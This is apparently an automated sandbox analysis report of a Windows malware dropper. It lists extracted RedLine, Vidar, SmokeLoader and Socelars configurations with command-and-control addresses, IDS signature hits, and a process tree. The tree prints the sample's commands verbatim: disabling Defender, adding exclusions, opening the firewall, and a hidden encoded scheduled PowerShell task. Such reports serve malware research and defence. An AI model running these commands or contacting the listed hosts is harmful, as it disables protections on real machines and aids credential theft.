Analysis
-
max time kernel
151s -
max time network
151s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
26/12/2021, 06:26
Static task
static1
Behavioral task
behavioral1
Sample
a15fcb15ff8d0824099fe99986c3425f.exe
Resource
win7-en-20211208
General
-
Target
a15fcb15ff8d0824099fe99986c3425f.exe
-
Size
6.3MB
-
MD5
a15fcb15ff8d0824099fe99986c3425f
-
SHA1
b041d309bcb43b100d7f93a99ad43e8725413ceb
-
SHA256
a8608c25f43dcab1c8501cb89b796d75b94a0abd260d3cee39a7e56e889326d6
-
SHA512
1ed23bdf6a454d8dc36abdbdc76eff61c79e0b25970cf98cea71e4873bb417594870ff5500cb0595abb6c3dbb9b451ad92e6e05ba1eedbe9f03f5edf36f73f45
Malware Config
Extracted
socelars
http://www.biohazardgraphics.com/
Extracted
vidar
49.2
915
https://mstdn.social/@kipriauk9
https://qoto.org/@kipriauk8
-
profile_id
915
Extracted
redline
media22ns
65.108.69.168:13293
Extracted
redline
userv1
159.69.246.184:13127
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4228 3232 rundll32.exe 127 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
resource yara_rule behavioral2/memory/3316-296-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/3316-302-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/2184-305-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/3316-303-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/2184-306-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/2184-298-0x000000000041932A-mapping.dmp family_redline behavioral2/memory/3316-297-0x0000000000419336-mapping.dmp family_redline behavioral2/memory/2184-295-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000500000001ab71-155.dat family_socelars behavioral2/files/0x000500000001ab71-174.dat family_socelars -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/files/0x000500000001ab7d-188.dat WebBrowserPassView behavioral2/files/0x000500000001ab7d-226.dat WebBrowserPassView -
Nirsoft 5 IoCs
resource yara_rule behavioral2/files/0x000500000001ab7d-188.dat Nirsoft behavioral2/files/0x000500000001ab7d-226.dat Nirsoft behavioral2/memory/2004-321-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft behavioral2/files/0x000500000001ab8d-320.dat Nirsoft behavioral2/files/0x000500000001ab8d-319.dat Nirsoft -
Vidar Stealer 2 IoCs
resource yara_rule behavioral2/memory/748-273-0x0000000000400000-0x00000000008B0000-memory.dmp family_vidar behavioral2/memory/748-271-0x0000000000DD0000-0x0000000000EA5000-memory.dmp family_vidar -
resource yara_rule behavioral2/files/0x000600000001ab65-120.dat aspack_v212_v242 behavioral2/files/0x000600000001ab65-122.dat aspack_v212_v242 behavioral2/files/0x000700000001ab66-119.dat aspack_v212_v242 behavioral2/files/0x000700000001ab66-124.dat aspack_v212_v242 behavioral2/files/0x000600000001ab6b-125.dat aspack_v212_v242 behavioral2/files/0x000600000001ab6b-126.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 19 IoCs
pid Process 3700 setup_install.exe 2928 Thu1185ccb71be14d.exe 2000 Thu11d4773c01d6f0.exe 2752 Thu1185475076e48cb16.exe 1576 Thu111723557c117162.exe 2464 Thu11e9a815c8cbb1a.exe 748 Thu115efe21f1a89d5.exe 2364 Thu11905232b5734.exe 2028 Thu1179364c94e82.exe 844 Thu11cf387a29397511.exe 3096 Thu11307f0493.exe 3032 Thu11a637868f8aa.exe 2988 Thu110155a356f.exe 1424 Thu11f7717aa35a4ea.exe 1588 Thu11f106a00ed17759.exe 2876 Thu11f281fb2df.exe 3784 Thu11cf387a29397511.exe 436 Thu11307f0493.tmp 1616 Thu11a637868f8aa.exe -
Modifies Windows Firewall 1 TTPs
-
Loads dropped DLL 8 IoCs
pid Process 3700 setup_install.exe 3700 setup_install.exe 3700 setup_install.exe 3700 setup_install.exe 3700 setup_install.exe 3700 setup_install.exe 3700 setup_install.exe 436 Thu11307f0493.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 40 ip-api.com 57 ipinfo.io 58 ipinfo.io 218 ipinfo.io 219 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 844 set thread context of 3784 844 Thu11cf387a29397511.exe 102 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
pid pid_target Process procid_target 2460 2364 WerFault.exe 88 4084 2028 WerFault.exe 95 4952 4300 WerFault.exe 155 5588 4900 WerFault.exe 138 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5312 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4288 timeout.exe -
Kills process with taskkill 3 IoCs
pid Process 2452 taskkill.exe 860 taskkill.exe 4992 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
description pid Process Token: SeCreateTokenPrivilege 1576 Thu111723557c117162.exe Token: SeAssignPrimaryTokenPrivilege 1576 Thu111723557c117162.exe Token: SeLockMemoryPrivilege 1576 Thu111723557c117162.exe Token: SeIncreaseQuotaPrivilege 1576 Thu111723557c117162.exe Token: SeMachineAccountPrivilege 1576 Thu111723557c117162.exe Token: SeTcbPrivilege 1576 Thu111723557c117162.exe Token: SeSecurityPrivilege 1576 Thu111723557c117162.exe Token: SeTakeOwnershipPrivilege 1576 Thu111723557c117162.exe Token: SeLoadDriverPrivilege 1576 Thu111723557c117162.exe Token: SeSystemProfilePrivilege 1576 Thu111723557c117162.exe Token: SeSystemtimePrivilege 1576 Thu111723557c117162.exe Token: SeProfSingleProcessPrivilege 1576 Thu111723557c117162.exe Token: SeIncBasePriorityPrivilege 1576 Thu111723557c117162.exe Token: SeCreatePagefilePrivilege 1576 Thu111723557c117162.exe Token: SeCreatePermanentPrivilege 1576 Thu111723557c117162.exe Token: SeBackupPrivilege 1576 Thu111723557c117162.exe Token: SeRestorePrivilege 1576 Thu111723557c117162.exe Token: SeShutdownPrivilege 1576 Thu111723557c117162.exe Token: SeDebugPrivilege 1576 Thu111723557c117162.exe Token: SeAuditPrivilege 1576 Thu111723557c117162.exe Token: SeSystemEnvironmentPrivilege 1576 Thu111723557c117162.exe Token: SeChangeNotifyPrivilege 1576 Thu111723557c117162.exe Token: SeRemoteShutdownPrivilege 1576 Thu111723557c117162.exe Token: SeUndockPrivilege 1576 Thu111723557c117162.exe Token: SeSyncAgentPrivilege 1576 Thu111723557c117162.exe Token: SeEnableDelegationPrivilege 1576 Thu111723557c117162.exe Token: SeManageVolumePrivilege 1576 Thu111723557c117162.exe Token: SeImpersonatePrivilege 1576 Thu111723557c117162.exe Token: SeCreateGlobalPrivilege 1576 Thu111723557c117162.exe Token: 31 1576 Thu111723557c117162.exe Token: 32 1576 Thu111723557c117162.exe Token: 33 1576 Thu111723557c117162.exe Token: 34 1576 Thu111723557c117162.exe Token: 35 1576 Thu111723557c117162.exe Token: SeDebugPrivilege 2028 Thu1179364c94e82.exe Token: SeDebugPrivilege 2000 Thu11d4773c01d6f0.exe Token: SeDebugPrivilege 2364 Thu11905232b5734.exe Token: SeDebugPrivilege 1588 Thu11f106a00ed17759.exe Token: SeDebugPrivilege 1684 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 692 wrote to memory of 3700 692 a15fcb15ff8d0824099fe99986c3425f.exe 69 PID 692 wrote to memory of 3700 692 a15fcb15ff8d0824099fe99986c3425f.exe 69 PID 692 wrote to memory of 3700 692 a15fcb15ff8d0824099fe99986c3425f.exe 69 PID 3700 wrote to memory of 4076 3700 setup_install.exe 72 PID 3700 wrote to memory of 4076 3700 setup_install.exe 72 PID 3700 wrote to memory of 4076 3700 setup_install.exe 72 PID 3700 wrote to memory of 3064 3700 setup_install.exe 73 PID 3700 wrote to memory of 3064 3700 setup_install.exe 73 PID 3700 wrote to memory of 3064 3700 setup_install.exe 73 PID 3700 wrote to memory of 4036 3700 setup_install.exe 74 PID 3700 wrote to memory of 4036 3700 setup_install.exe 74 PID 3700 wrote to memory of 4036 3700 setup_install.exe 74 PID 3700 wrote to memory of 1232 3700 setup_install.exe 75 PID 3700 wrote to memory of 1232 3700 setup_install.exe 75 PID 3700 wrote to memory of 1232 3700 setup_install.exe 75 PID 3700 wrote to memory of 404 3700 setup_install.exe 80 PID 3700 wrote to memory of 404 3700 setup_install.exe 80 PID 3700 wrote to memory of 404 3700 setup_install.exe 80 PID 3700 wrote to memory of 3232 3700 setup_install.exe 76 PID 3700 wrote to memory of 3232 3700 setup_install.exe 76 PID 3700 wrote to memory of 3232 3700 setup_install.exe 76 PID 3700 wrote to memory of 4012 3700 setup_install.exe 79 PID 3700 wrote to memory of 4012 3700 setup_install.exe 79 PID 3700 wrote to memory of 4012 3700 setup_install.exe 79 PID 3700 wrote to memory of 3436 3700 setup_install.exe 78 PID 3700 wrote to memory of 3436 3700 setup_install.exe 78 PID 3700 wrote to memory of 3436 3700 setup_install.exe 78 PID 3700 wrote to memory of 1368 3700 setup_install.exe 77 PID 3700 wrote to memory of 1368 3700 setup_install.exe 77 PID 3700 wrote to memory of 1368 3700 setup_install.exe 77 PID 1232 wrote to memory of 2928 1232 cmd.exe 82 PID 1232 wrote to memory of 2928 1232 cmd.exe 82 PID 1232 wrote to memory of 2928 1232 cmd.exe 82 PID 3700 wrote to memory of 2920 3700 setup_install.exe 81 PID 3700 wrote to memory of 2920 3700 setup_install.exe 81 PID 3700 wrote to memory of 2920 3700 setup_install.exe 81 PID 3232 wrote to memory of 2000 3232 cmd.exe 84 PID 3232 wrote to memory of 2000 3232 cmd.exe 84 PID 3232 wrote to memory of 2000 3232 cmd.exe 84 PID 3700 wrote to memory of 2132 3700 setup_install.exe 83 PID 3700 wrote to memory of 2132 3700 setup_install.exe 83 PID 3700 wrote to memory of 2132 3700 setup_install.exe 83 PID 4036 wrote to memory of 2752 4036 cmd.exe 85 PID 4036 wrote to memory of 2752 4036 cmd.exe 85 PID 4036 wrote to memory of 2752 4036 cmd.exe 85 PID 3436 wrote to memory of 1576 3436 cmd.exe 107 PID 3436 wrote to memory of 1576 3436 cmd.exe 107 PID 3436 wrote to memory of 1576 3436 cmd.exe 107 PID 3700 wrote to memory of 1372 3700 setup_install.exe 106 PID 3700 wrote to memory of 1372 3700 setup_install.exe 106 PID 3700 wrote to memory of 1372 3700 setup_install.exe 106 PID 404 wrote to memory of 748 404 cmd.exe 101 PID 404 wrote to memory of 748 404 cmd.exe 101 PID 404 wrote to memory of 748 404 cmd.exe 101 PID 4076 wrote to memory of 1544 4076 cmd.exe 100 PID 4076 wrote to memory of 1544 4076 cmd.exe 100 PID 4076 wrote to memory of 1544 4076 cmd.exe 100 PID 4012 wrote to memory of 2464 4012 cmd.exe 99 PID 4012 wrote to memory of 2464 4012 cmd.exe 99 PID 4012 wrote to memory of 2464 4012 cmd.exe 99 PID 3700 wrote to memory of 3768 3700 setup_install.exe 86 PID 3700 wrote to memory of 3768 3700 setup_install.exe 86 PID 3700 wrote to memory of 3768 3700 setup_install.exe 86 PID 3064 wrote to memory of 1684 3064 cmd.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\a15fcb15ff8d0824099fe99986c3425f.exe"C:\Users\Admin\AppData\Local\Temp\a15fcb15ff8d0824099fe99986c3425f.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:692 -
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\setup_install.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3700 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable3⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:1544
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"3⤵
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1185475076e48cb16.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4036 -
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu1185475076e48cb16.exeThu1185475076e48cb16.exe4⤵
- Executes dropped EXE
PID:2752 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /y .\62XW.NZd5⤵PID:1776
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1185ccb71be14d.exe3⤵
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu1185ccb71be14d.exeThu1185ccb71be14d.exe4⤵
- Executes dropped EXE
PID:2928 -
C:\Users\Admin\Pictures\Adobe Films\6hDQ1EUCRuWWKCAjIejhNu55.exe"C:\Users\Admin\Pictures\Adobe Films\6hDQ1EUCRuWWKCAjIejhNu55.exe"5⤵PID:1096
-
-
C:\Users\Admin\Pictures\Adobe Films\96j26SOGCNn6KY4MZv1Zap95.exe"C:\Users\Admin\Pictures\Adobe Films\96j26SOGCNn6KY4MZv1Zap95.exe"5⤵PID:4744
-
-
C:\Users\Admin\Pictures\Adobe Films\NkQt1u52SON2sRd7sBPWwM8K.exe"C:\Users\Admin\Pictures\Adobe Films\NkQt1u52SON2sRd7sBPWwM8K.exe"5⤵PID:4736
-
-
C:\Users\Admin\Pictures\Adobe Films\4tIsmTSkabDEkid3tH6S_vDR.exe"C:\Users\Admin\Pictures\Adobe Films\4tIsmTSkabDEkid3tH6S_vDR.exe"5⤵PID:4936
-
-
C:\Users\Admin\Pictures\Adobe Films\yVKGPCHydmvpEINyrMGMJkiv.exe"C:\Users\Admin\Pictures\Adobe Films\yVKGPCHydmvpEINyrMGMJkiv.exe"5⤵PID:4928
-
-
C:\Users\Admin\Pictures\Adobe Films\1yNIW0dtPVuWrpldrv5mBJCs.exe"C:\Users\Admin\Pictures\Adobe Films\1yNIW0dtPVuWrpldrv5mBJCs.exe"5⤵PID:4900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 6646⤵
- Program crash
PID:5588
-
-
-
C:\Users\Admin\Pictures\Adobe Films\A969a00lCtVaEQ0DrCLBIoG5.exe"C:\Users\Admin\Pictures\Adobe Films\A969a00lCtVaEQ0DrCLBIoG5.exe"5⤵PID:4856
-
-
C:\Users\Admin\Pictures\Adobe Films\pzc4zCE6_9e56a7r5EDRe4eQ.exe"C:\Users\Admin\Pictures\Adobe Films\pzc4zCE6_9e56a7r5EDRe4eQ.exe"5⤵PID:5100
-
-
C:\Users\Admin\Pictures\Adobe Films\E59243SIkeZdlAyNruJMXyFr.exe"C:\Users\Admin\Pictures\Adobe Films\E59243SIkeZdlAyNruJMXyFr.exe"5⤵PID:5092
-
-
C:\Users\Admin\Pictures\Adobe Films\iTgyhkvRJ2YBK_tPwyQGdOqH.exe"C:\Users\Admin\Pictures\Adobe Films\iTgyhkvRJ2YBK_tPwyQGdOqH.exe"5⤵PID:5076
-
-
C:\Users\Admin\Pictures\Adobe Films\EGFT0UJCC27T6IW2USgi7RN_.exe"C:\Users\Admin\Pictures\Adobe Films\EGFT0UJCC27T6IW2USgi7RN_.exe"5⤵PID:5084
-
-
C:\Users\Admin\Pictures\Adobe Films\L0TY8FuHXOhTtbVE97lxpjYs.exe"C:\Users\Admin\Pictures\Adobe Films\L0TY8FuHXOhTtbVE97lxpjYs.exe"5⤵PID:5068
-
-
C:\Users\Admin\Pictures\Adobe Films\ZMQsB8eiWCv1vizC5Xj0Cf1J.exe"C:\Users\Admin\Pictures\Adobe Films\ZMQsB8eiWCv1vizC5Xj0Cf1J.exe"5⤵PID:5060
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \6⤵PID:5756
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes6⤵PID:5808
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal6⤵PID:5984
-
-
-
C:\Users\Admin\Pictures\Adobe Films\RpE1w1iaEhX9cwnH60cQVw6C.exe"C:\Users\Admin\Pictures\Adobe Films\RpE1w1iaEhX9cwnH60cQVw6C.exe"5⤵PID:5052
-
C:\Users\Public\Videos\hgfdfds.exe"C:\Users\Public\Videos\hgfdfds.exe"6⤵PID:4816
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Cnl6g4rFOGqnVOWMtTwBvjE7.exe"C:\Users\Admin\Pictures\Adobe Films\Cnl6g4rFOGqnVOWMtTwBvjE7.exe"5⤵PID:5040
-
C:\Users\Admin\AppData\Local\Temp\7zSC616.tmp\Install.exe.\Install.exe6⤵PID:1124
-
C:\Users\Admin\AppData\Local\Temp\7zSE0F1.tmp\Install.exe.\Install.exe /S /site_id "525403"7⤵PID:1484
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &8⤵PID:4212
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"9⤵PID:5128
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True10⤵PID:5364
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:5320
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"8⤵PID:3148
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&9⤵PID:5280
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"8⤵PID:4328
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&9⤵PID:5196
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3210⤵PID:5232
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6410⤵PID:5384
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gTiNRuWZc" /SC once /ST 01:38:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="8⤵
- Creates scheduled task(s)
PID:5312
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gTiNRuWZc"8⤵PID:5704
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\CNr7GyOVjJr68ZTtBBDk9pT3.exe"C:\Users\Admin\Pictures\Adobe Films\CNr7GyOVjJr68ZTtBBDk9pT3.exe"5⤵PID:5032
-
C:\Users\Admin\AppData\Local\5f888d8c-2f24-4839-978c-e60807f562ac.exe"C:\Users\Admin\AppData\Local\5f888d8c-2f24-4839-978c-e60807f562ac.exe"6⤵PID:5916
-
-
C:\Users\Admin\AppData\Local\ee4171c1-5881-4783-a137-c260bc86d283.exe"C:\Users\Admin\AppData\Local\ee4171c1-5881-4783-a137-c260bc86d283.exe"6⤵PID:5168
-
-
-
C:\Users\Admin\Pictures\Adobe Films\wcuhKSlWqslgz2Qet0QPZdLP.exe"C:\Users\Admin\Pictures\Adobe Films\wcuhKSlWqslgz2Qet0QPZdLP.exe"5⤵PID:5020
-
-
C:\Users\Admin\Pictures\Adobe Films\A7zdVo9BXyNxcbokck4RzWQm.exe"C:\Users\Admin\Pictures\Adobe Films\A7zdVo9BXyNxcbokck4RzWQm.exe"5⤵PID:5008
-
-
C:\Users\Admin\Pictures\Adobe Films\q4DP5Ihs3WhuG0gB0NQLmteq.exe"C:\Users\Admin\Pictures\Adobe Films\q4DP5Ihs3WhuG0gB0NQLmteq.exe"5⤵PID:4328
-
-
C:\Users\Admin\Pictures\Adobe Films\xLe6HmffavM2hZt9HI2MyORU.exe"C:\Users\Admin\Pictures\Adobe Films\xLe6HmffavM2hZt9HI2MyORU.exe"5⤵PID:680
-
-
C:\Users\Admin\Pictures\Adobe Films\FZ_a8mndiYdjZXgMhtwrOxFe.exe"C:\Users\Admin\Pictures\Adobe Films\FZ_a8mndiYdjZXgMhtwrOxFe.exe"5⤵PID:4300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4300 -s 4006⤵
- Program crash
PID:4952
-
-
-
C:\Users\Admin\Pictures\Adobe Films\CzZCONUxiAStJ59T7qxfj0eZ.exe"C:\Users\Admin\Pictures\Adobe Films\CzZCONUxiAStJ59T7qxfj0eZ.exe"5⤵PID:1036
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11d4773c01d6f0.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11d4773c01d6f0.exeThu11d4773c01d6f0.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2000 -
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11d4773c01d6f0.exeC:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11d4773c01d6f0.exe5⤵PID:2184
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11905232b5734.exe3⤵PID:1368
-
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11905232b5734.exeThu11905232b5734.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2364 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2364 -s 19765⤵
- Program crash
PID:2460
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu111723557c117162.exe3⤵
- Suspicious use of WriteProcessMemory
PID:3436 -
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu111723557c117162.exeThu111723557c117162.exe4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1576 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:3676
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:860
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu11e9a815c8cbb1a.exe3⤵
- Suspicious use of WriteProcessMemory
PID:4012 -
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu11e9a815c8cbb1a.exeThu11e9a815c8cbb1a.exe4⤵
- Executes dropped EXE
PID:2464
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu115efe21f1a89d5.exe3⤵
- Suspicious use of WriteProcessMemory
PID:404 -
C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu115efe21f1a89d5.exeThu115efe21f1a89d5.exe4⤵
- Executes dropped EXE
PID:748 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Thu115efe21f1a89d5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS4B2AC406\Thu115efe21f1a89d5.exe" & del C:\ProgramData\*.dll & exit5⤵PID:4380
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Thu115efe21f1a89d5.exe /f6⤵
- Kills process with taskkill
PID:4992
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 66⤵
- Delays execution with timeout.exe
PID:4288
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu110155a356f.exe3⤵PID:2920
-
